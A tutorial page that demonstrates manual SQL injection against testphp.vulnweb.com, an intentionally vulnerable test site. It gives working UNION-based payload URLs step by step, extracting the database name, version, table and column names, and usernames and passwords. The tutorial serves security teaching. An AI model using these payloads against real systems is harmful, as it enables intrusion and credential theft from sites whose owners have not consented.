Website
Update is in progress

Before starting my tutorial regarding manual sqli injection in a ethical manner, I needed a vulnerable site to test. Acunetix maintains its own test sites which we can scan and use to test the product.

  • http://testhtml5.vulnweb.com
  • http://testphp.vulnweb.com
  • http://testaspnet.vulnweb.com
  • http://testasp.vulnweb.com
  • Performing SQL injection manually on a live website “testphp.vulnweb.com”:

  • Home Page of testphp.Vulnweb.com
    This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help in testing various Web Security Issues. It also helps we understand how developer errors and bad configuration may let someone break into wer website. We can use it to test other tools and wer manual hacking skills as well. We can Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.

    Home Page of testphp.Vulnweb.com
  • Open given below targeted URL in the browser
    http://testphp.vulnweb.com/artists.php?
  • So here we are going test SQL injection for “id=1″
    http://testphp.vulnweb.com/artists.php?artist=1 Now use error base technique by adding an apostrophe (‘) symbol at the end of input which will try to break the query. http://testphp.vulnweb.com/artists.php?artist=1’ In the given screenshot we can see we have got an error message which means the running site is infected by SQL injection. Now using ORDER BY keyword to sort the records in ascending or descending order for id=1 http://testphp.vulnweb.com/artists.php?artist=1 order by 1 Similarly repeating for order 2, 3 and so on one by one. http://testphp.vulnweb.com/artists.php?artist=1 order by 4 From the screenshot, we can see we have got an error at the order by 4 which means it consists only three records. Let’s penetrate more inside using union base injection to select statement from a different table. http://testphp.vulnweb.com/artists.php?artist=1 union select 1,2,3 From the screenshot, we can see it is show result for only one table not for others. Now try to pass wrong input into the database through URL by replacing artist=1 from artist=-1 as given below: http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,3 Hence we can see now it is showing the result for the remaining two tables also. Use the next query to fetch the name of the database
    http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,database(),3 From the screenshot, we can read the database name "acuart" Next query will extract the current username as well as a version of the database system
    http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,version(),current_user() Here we have retrieve "5.1.73 0ubuntu0 10.04.1" as version and "[email protected]" as the current user Through the next query, we will try to fetch table name inside the database
    http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1 From the screenshot we can read the name of the first table is artists. http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1 From the screenshot we can read the name of the second table is "carts". Similarly, repeating the same query for another table with slight change
    http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 2,1 We got table 3: "categ" http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 3,1 We got table 4:"featured" Similarly repeat the same query for table 4, 5, 6, and 7 with making slight changes in LIMIT.
    http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 7,1 We got table 7: "users" http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 8,1 Since we didn’t get anything when the limit is set 8, 1 hence there might be 8 tables only inside the database. the concat function is used for concatenation of two or more string into a single string.
    http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() From screen we can see through concat function we have successfully retrieved all table name inside the database.
  • Table 1: artist
  • Table 2: Carts
  • Table 3: Categ
  • Table 4: Featured
  • Table 5: Guestbook
  • Table 6: Pictures
  • Table 7: Product
  • Table 8: users
  • Maybe we can get some important data from the users table, so let’s penetrate more inside. Again Use the concat function for table users for retrieving its entire column names.
    http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' We successfully retrieve all eight column names from inside the table users. Use the concat function for selecting uname from table users by executing the following query through URL
    http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(uname),3 from users From the screenshot, we can read "uname: test" Use the concat function for selecting pass from table users by executing the following query through URL
    http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(pass),3 from users From the screenshot, we can read "pass: test"
    Warning :
    The articles and tutorials published on this site are performed under safe environments with all safety measures and supervision of Cyber Experts & Professionals. And it is only intend for educational purposes & to be aware about such activities. These contents should not be used for any illegal purposes.
    Always Remember,
    "Performing such things without taking concerns of respective owners of System & Resources is tottaly illegal and punishable under various IT Acts and Laws."
    Top